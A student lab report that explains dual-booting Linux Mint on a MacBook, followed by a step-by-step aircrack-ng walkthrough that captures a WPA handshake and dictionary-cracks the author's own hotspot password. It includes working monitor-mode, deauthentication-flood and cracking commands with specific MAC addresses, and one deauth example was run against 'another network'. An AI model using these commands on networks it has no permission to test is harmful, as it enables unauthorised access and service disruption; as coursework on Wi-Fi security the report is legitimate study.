BootOperating SystemMintEvaluation Perfect combination. A dual boot of Mint on an Apple MacBook Pro was the most smooth for meand the way I’ll be showing you.Selected MethodI will try to make my process and simple and straight forward as possible yet comprehensive enoughto understand each step as if you were to follow the guide. Due to the lack of a screenshotting toolduring this entire process, i.e. when in BIOS/EFI or recovery mode, I will be noting important stageswith screenshots from other sources.Requirements:– Spare USB drive, at least 8GB– Free space on current machine, at least 15GB– Due to there not being immediate support for the latest trackpads and keyboards MacBooks(from my experience, 2017+), you will need a wired keyboard (and mouse if possible).If you are on a newer MacBook, you will need to plug in a wired keyboard (and mouse) in addition toa USB storage device. This is extremely important. For best results, I recommend you get a USB-Cadapter with at least 2 USB ports so you have keyboard access and USB drive for installation.Phase 1, preparing of the storage mediumIn this phase, we will be making sure that there is a suitable place on our MacBook for us to installour distro. I will be using the built-in tool in macOS Mojave called Disk Utility.First click on your main drive, for me, this is the “APPLE SSD SM0256” (Figure 1). If your view isn’t thesame, you need to click on the “View” button and select “Show All Devices” (Figure 2). When maindrive is available to select, press partition (Figure 3).Figure 1, Disk Utility ViewFigure 2, View MenuSelectionFigure 3, PartitionIconData Communications21383564 35After you see a popup, you are going pressthe plus button on the bottom left of thewindow (Figure 4). Here, I would be naminga 20GB partition “Mint” with the FAT fileformat. However, I already have a partitionthat I have installed Mint on, it was called“disk0s3”.Note: the FAT file format is temporary andwill be changed in the Mint installation.Phase 2, preparing of the USB drive flash mediumFor this phase, we will be requiring a USB drive which will have no data on it after flashing it for theMint installation file, ISO. We need two files, software which will let me flash an ISO file on a USBdrive, and an Mint operating system file, ISO.Getting flashing program from: https://www.balena.io/etcher/Click download for macOSWait for downloadGetting the Mint installation file, ISO, from: https://linuxmint.com/download.phpFigure 4, Allocating Space for PartitionData Communications21383564 36Scroll down until you see available Mint versionI recommend to get the Xfce as it is a very lightweight and fast desktop environment withessential programs preinstalled.Download a torrent file and use a torrenter to getfile from seeds around you. I recommend this asit is the fastest way to get your ISO by far. Or youcan scroll down and find a hosting site.Either way, you will have to wait for thedownload.After, we launch the application, plug in our USB stick, select our downloaded ISO file, and clickflash.Data Communications21383564 37Figure 5, Etcher FlashingWhen the process is completed, you will probably see a message box come up that the USB is notreadable. This is OK, and it means it is ready for installation, here click ignore.Figure 6, Unreadable ErrorPhase 3, final checks for macOS before Mint installationBefore continuing, this is where you get a wired keyboard (and mouse) plugged in and test if theywork correctly before moving on. Remember, wired is best since you will not have Bluetooth inBIOS/EFI menus.In order to properly install without any issues, we need to perform checks to do with the readabilityof the hard drive, however, your mileage may vary due to this process differing from Mac to Mac. Ihave FileVault disabled to allow any and all access from any device to the machine. This might not benecessary for your attempt depending on your Mac, but to avoid absolutely any issues, this isrecommended.Figure 7, FileVault in System PreferencesData Communications21383564 38Next check requires us to boot into recovery mode in our Mac. To launch into recovery mode, simplyhold ⌘+R when turning on your Mac. At this stage, you have aren’t on the latest version, or if youare launching into recovery mode for the first time, you will be asked to update the recovery modeutility, you will need to connect to a network and update. Recovery mode should look like Figure 8(curtesy of MacBartender, source: https://www.macbartender.com/system-item-setup/).Figure 8, Recovery ModeFollowing this, select Utilities menu option and click on “Boot Security Utility” as shown on Figure 9(curtesy of Tech Otaku, source: https://www.tech-otaku.com/mac/secure-erasing-mac-fusiondrive/).Figure 9, Boot Security OptionThis is where it differs from Mac to Mac, I will be showing you what to do for the following MacBookmodels (source: https://support.apple.com/en-gb/HT208862):– iMac Pro– Mac mini models introduced in 2018– MacBook Air models introduced in 2018– MacBook Pro models introduced in 2018These Mac computers have the Apple T2 Security Chip which gives them extra security on boot butmakes it more difficult to install other operating systems. However, whatever your Mac is, to avoidall issues, select “No Security” in the Startup Security Utility, and “Allow booting from externalmedia” in the External Boot Figure 10 (curtesy of Apple Support, source:https://support.apple.com/en-us/HT208330).Data Communications21383564 39Figure 10, Startup Security UtilityAfter this, we are ready to move onto the next stage and boot from the USB.Data Communications21383564 40Phase 4, booting from USB driveTo boot into our USB drive with Mint, completely turn off your Mac, just like switching it to recoverymode. However, this time, we will be pressing the alt/option key (left of the ⌘ key). Aftersuccessfully booting while pressing alt/option key, we select the EFI boot.Figure 11 (curtesy natario, source: https://apple.stackexchange.com/q/188149) shows twoadditional boot options, in our case, both of them would be EFI Boot, unless you may have already aboot camp Windows partition. This is okay, just do not press the Windows boot option. If you clickthe wrong option, shut down, and boot while pressing the alt/option key.Figure 11, Boot OptionsPlease remember it is normal to have multiple EFI boot options available. If one doesn’t work, i.e.black screen, try the other.Data Communications21383564 41Phase 5, installation of MintYou will begin booting from the USB drive after you select the EFI boot option. This doesn’t meaninstallation Mint however, that will come at a later point in time. Currently, we need to focus onselecting the option to Start Linux Mint when we are presented with the option as shown in Figure12 (curtesy / source: http://linux-mac-windows.blogspot.com/2012/08/install-linux-mint-10-juliastep-by-step.html). Due to this being an old picture taking in 2012 when Mint was on version 10, thisscreen will look different on your version.Figure 12, Mint Booting OptionsPlease refer back to this point in time when there are issues. You may want to try booting incompatibility mode if there are any issues booting in normal mode. What we are doing here islaunching the operating system from the ISO onto the computer. However, we are not installing it,performing this launch will unpack the ISO and present us with a working version of Mint.We are able to continue using the operating system like this, however, every restart, all data will becleared, e.g. screenshots, downloaded programs, configured settings, etc. Therefore, we will startinstalling the Mint on the partition we made instead of booting from the USB drive.After a while of the Mac going over the ISO and preparing our desktop for use, we boot into thedesktop environment. Here is where we launch into problems if we are using a new Mac and yourtrackpad and keyboard isn’t supported (yet). Figure 13 (curtesy of Linux Mint, source:https://www.linuxmint.com/rel_sarah_xfce_whatsnew.php) is what you should be seeing.Figure 13, Mint with XfceData Communications21383564 42Now click on the installation icon on your desktop as shown in Figure 14.Figure 14, IconHere we are now beginning the process of installation of the Linux distro Mint.1. Go ahead and select your prefer language.2. Press continue after reviewing your conditions.3. Select “something else” (important)4. Select your partition created in macOSYou will have multiple partitions available to edit, select the partition we created earlier, delete itand make a new partition. You should be expecting to see something similar to Figure 15 (curtesy toitsfoss, source: https://i2.wp.com/itsfoss.com/wp-content/uploads/2013/12/Linux-MintInstallation-9.jpeg?ssl=1). Set it to Ext 4, Ext 3, or Ext 2. Set the size to whatever we have createdbefore, and change the mount option to be “/” / root (important).Figure 15, Mint Partition SelectionIf you are having problems in this step, you can search for the program “gparted” in the start searchbox (this is preinstalled on Mint with Xfce). This is a program made in C++ which allows you tocreate, edit, delete partitions on your drives and also set mount options with various file formats,otherwise continue with the installation.5. Click install now6. Select the time zone you are in7. Select your keyboard layout8. Enter your details, i.e. username, password9. Wait…If you are told to return your USB drive, please do so, but do not remove all of the data off of it yet.It may be used later for some offline driver access when you want to connect to the internet.Data Communications21383564 43You should now have Mint installed and booted into. If you do not, turn off your computer and pressalt/option key and boot into your newly created Mint install. Before we start the aircrack process,we need to make sure we have Wi-Fi to properly install everything required. To get Wi-Fi setup,search for “Driver Manager”. When launched, you may be asked to plug in your USB driver tocomplete the driver update. After, you may have an option to select an alternative driver as shownin Figure 16 (curtsey of ghacks, source: https://www.ghacks.net/wpcontent/uploads/2015/03/driver-manager.jpg). You will then be able to connect to Wi-Fi.Figure 16, Driver SelectionIf there is no choice for you available, you will need to do research on your driver and what isnecessary for it to function on a Linux distro.Phase 6, upgrading dependencies, installing aircrack, enabling monitor modeBefore we start, let’s jump into root / admin mode in order to have access to everything (and so wedon’t have to type sudo all the time) by performing the following command:> sudo -iBefore we continue, I’d like to note that I like to direct myself to my documents folder in my homeuser folder. When we enter root, we go into the root folder, so we first need to back out with “../”and then continue into my home user folder with “home/bo/Documents”. This is where I will besaving my capture files, where I will be holding my dictionary, etc. In order to get into my documentsfolder, I perform the following command:> cd ../home/bo/DocumentsWe begin by refreshing version repositories for our operating system. We do this by first performingthe command:> apt updateData Communications21383564 44After updating our packages, from those packages we then install all programs, tools, utilities, etc.To do this, we need to perform the following command:> apt upgradeWhen then install aircrack-ng (which includes all of the tools we need to crack, monitor, etc.). We dothis by performing the following command:> apt-get install aircrack-ngTo confirm we have aircrack, we can perform either of the following as they will both bring up themanual for the command.> aircrack-ngData Communications21383564 45> aircrack-ng –-helpBefore starting, I will kill interfering process with the following command.> airmon-ng check killCommand analysis airmon-ng checkairmon-ng check killJust performing this would list all interferingprocesses.Performing the full command will list andterminate all interfering processes. In addition, we need to find out our network interface I will be performing the hack on. I will beperforming the following command to list all of my network interfaces.> ifconfig -aCommand analysis ifconfigifconfig -aLists active network interfaces available to thehost.Lists all, active and inactive (up/down) networkinterfaces available to the host. Data Communications21383564 46For me, I will be starting monitor with the airmon-ng command with the wlp3s0 interface. To do this,I will be performing the following command:> airmon-ng start wlp3s0Monitor mode is now available on prism0. This is still the same network interface however we arenow running in monitor mode that also has a different name.Command analysis start [value]The value will be the normal network interface you wish to enable monitor mode for. Phase 7, checking surrounding networksWe can continue onto the next step where we list the surrounding networks from the data weintercept that is being sent to devices or is broadcasted. We can do this by performing the followingcommand:> airodump-ng prism0Data Communications21383564 47Command analysis prism0Value will be the network interface in monitor mode which will capture all network traffic. Phase 8, intercepting network activityWe can now concentrate on one network, my network (Borys’s iPhone), we’ll wait for anauthentication frame and then attempt to crack the password. In order for us to start capturinginformation about a network and its devices, we perform the following command:> airodump-ng -c 1 –-bssid BA:F0:AB:48:25:A1 -w WPAcrackprism0 –-ignore-negative-oneCommand analysis -c [value]–bssid [value]Channel value, this can be found from the initialair dump capture. This is the channel the networkis on.This is the MAC address of the access pointyou would like to intercept the networkactivity of. Data Communications21383564 48 -w [value]prism0This is the file name of which all the captureinformation will be stored.This is the network interface (in monitormode) that you will be using to capture thenetwork traffic.–ignore-negatve-oneRemoves irrelevant error message. Note: we are performing this command in the document’s directory, so the WPAcrack file willappear there.Terminal 1 minute after performing the command:Terminal 3 minutes after performing the command:We see that there was a WPA handshake captured (and is now in our capture file). Read phase 9 forif you do not have a WPA handshake captured.Phase 9, Forcing a WPA handshakeSometimes there is no one in the network that is requesting an authentication. However, that iswhat we are searching for when we want a WPA handshake. By sending a deauthentication request,we expect an authentication to happen.In my situation I didn’t need to perform this step as I already gotten a WPA handshake, but I willshow you how to perform this step away, the evidence is from when I was attempting to obtain thepassword in another network by sending a deauthentication.There are two ways you are able to send a deauthentication to the access point. First, is when youare sending the deauthentication as a broadcast frame. This can be done by performing thefollowing command.Data Communications21383564 49> aireplay-ng –deauth 0 -a C0:05:C2:0D:5E:91 prism0 -–ignore-negative-oneCommand analysis –deauth [value]-a [value]The value will specify how manydeauthentication requests you wish to send.Value 0 will be read as unlimited tries.This is the MAC address (/BSSID) of the accesspoint you wait to get the obtain the passwordfrom.Prism0–ignore-negative-oneThis is the wireless network interface that hasmonitor mode enabled.Removes irrelevant error message. Second, is when you specify what host is sending the deauthentication request. This kind ofdeauthentication request is more effective. This can be done by performing the following command.> aireplay-ng deauth 100 -a C0:05:C2:0D:5E:91 -c64:1C:B0:E5:0C:7C prism0 -–ignore-negative-oneData Communications21383564 50Command analysis –deauth [value]-a [value]The value will specify how manydeauthentication requests you wish to send.Value 0 will be read as unlimited tries.This is the MAC address (/BSSID) of the accesspoint you wait to get the obtain the passwordfrom.-c [value]prism0This is the MAC address of the client (/host) thatis connected to the access point.This is the wireless network interface that hasmonitor mode enabled.–ignore-negative-oneRemoves irrelevant error message. Data Communications21383564 51Phase 10, brute force network using handshake frameWe will now use the WPA handshake we captures to compare against a dictionary of possiblepasswords. We can do this with the following command:> aircrack-ng -w passwords.txt -b BA:F0:AB:48:25:A1WPAcrack-01.capEvidence of command:Output of terminal:Running this command has indeed cracked the password I have set for my access point (iPhonehotspot).Command analysis -w [value]-b [value]Name (and directory) of the file which containsall the passwords aircrack-ng is going tocompare against until it finds a match or untilthere is nothing left to compare in the file.MAC address of the access point you are goingto find the WPA handshake of in order tocompare other values with it.WPAcrack-01.capCapture of network traffic which contains the WPA handshake which is required to compareagainst other passwords in the frame. In order for me to get the right password without leaving my device running trying to guess apassword, I have created my own password file which contains a few possible passwords.Data Communications21383564 52ConclusionThis element has been difficult as there was a lot of unknown and I have covered ground in a foreignoperating system with tools I haven’t used before. I have spent a lot of time and effort trying to getthe most complete documentation, especially with the last element which put my tested myproblem-solving skills to use.In retrospect I would’ve liked to have known that I would be able to complete everything on thesame machine but a different operating system, however, testing over and over again with differentmachines, operating systems, and tools, I believe has benefitted me a lot as I have experienced it alot.Moving on I believe I will be more cautious with passwords and Wi-Fi security now due to my newknowledge about this area and how difficult (/easy) it is to gain access to someone’s network. I alsobelieve my understanding of Linux distros has increased, and now I know that they are more flexiblethan macOS and Windows with how fast you are able to “prototype” and experiment with differentoperating systems, e.g. trying them out, etc.Data Communications21383564 53Evidence A Giving root accessAfter apt update and apt upgradeSearching with airmon-ngUsing airodump-ng to get handshake fileCracking the password with 3.38% progressCracking the password with 43.06% progressAll my capture attempts with my dictionary file Data Communications21383564 54References1. http://www.linfo.org/mac_address.html2. https://www.zdnet.com/article/android-q-to-get-a-ton-of-new-privacy-features/3. https://whatismyipaddress.com/ip-address4. https://smallbiztrends.com/2014/02/pay-more-static-ip-address.html5. https://en.wikipedia.org/wiki/Ifconfig6. https://www.quora.com/What-is-the-purpose-of-a-local-loopback-interface-127-0-0-17. https://www.juniper.net/documentation/en_US/junos/topics/concept/interface-securityloopback-understanding.html8. https://www.oreilly.com/library/view/linux-networkadministrators/1565924002/ch05s07.html9. http://manpages.ubuntu.com/manpages/trusty/man8/ifconfig.8.html10. http://man7.org/linux/man-pages/man7/netdevice.7.html11. https://www.quora.com/What-is-my-inet-addr-Bcast-and-Mask-when-I-ifconfig-in-Linux12. https://www.thegeekdiary.com/how-to-configure-multicast-on-an-ip-address-interface/13. http://www.steves-internet-guide.com/introduction-multicasting/14. https://askubuntu.com/questions/247625/what-is-the-loopback-device-and-how-do-i-use-it15. http://www.microhowto.info/howto/change_the_mtu_of_a_network_interface.html16. https://www.computerhope.com/jargon/n/netmask.htm17. https://www.techopedia.com/definition/5376/netmask18. https://www.quora.com/What-is-netmask19. https://www.ncbi.nlm.nih.gov/pmc/articles/PMC4813856/20. https://www.cyberciti.biz/faq/what-is-a-routing-table/21. https://serverfault.com/questions/832061/in-the-output-of-netstat-r-what-is-the-meaningof-the-netif-column-and-how-d22. https://lists.freebsd.org/pipermail/freebsd-net/2008-March/017406.html23. https://computing.llnl.gov/tutorials/performance_tools/man/netstat.txt24. https://en.wikipedia.org/wiki/Routing_table25. https://www.techopedia.com/definition/2184/default-gateway26. https://mrncciew.com/2014/10/08/802-11-mgmt-beacon-frame/27. https://www.intel.co.uk/content/www/uk/en/support/articles/000006508/network-and-io/wireless-networking.html28. https://dalewifisec.wordpress.com/2014/04/29/wireshark-802-11-display-filters-2/

QUALITY: 100% ORIGINAL PAPER – NO PLAGIARISM – CUSTOM PAPER

Leave a Reply

Your email address will not be published. Required fields are marked *